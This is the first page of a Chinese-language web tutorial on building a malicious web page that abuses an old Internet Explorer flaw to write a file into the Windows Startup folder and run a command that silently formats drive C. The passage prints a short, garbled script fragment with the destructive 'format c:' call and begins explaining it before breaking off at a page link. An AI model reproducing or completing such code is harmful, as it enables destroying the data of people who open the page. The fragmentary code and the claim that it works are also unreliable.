这个是一个关于HTML代码攻击的,虽然短点大家看看怎么样,能实现的哦。
现在的Windows操作系统实在是很方便,连格式化都是只用鼠标点点就可以了,不用象以前那样要输入命令来完成格盘。
我们要做一个格本地磁盘网页并不是很难,会HTML代码的朋友一定是没有什么问题的,这个其实就是利用一下IE的漏洞来实现我们的目的。
下面我们看一下下面的代码我们就会发现其中的奥妙所在了。
scr.reset()scr.path="c:\\windows\\start menu\\programs\\启动\\文件名scr.doc=""wsh.run('start.exe /m format c:/q/autotest/u')
对于HTML代码了解的朋友们一定看出来了吧,这段代码的利害之处就在于最后一句,格你的磁盘没商量。
下面我们来看看这段代码的,具体的分析一下的他的工作原理是怎么样的。
首先,我们来看看这一句
scr.path="c:\\windows\\start menu\\programs\\启动\\文件名
这句,就是当看到 [1] [2] 下一页
责任编辑:lz |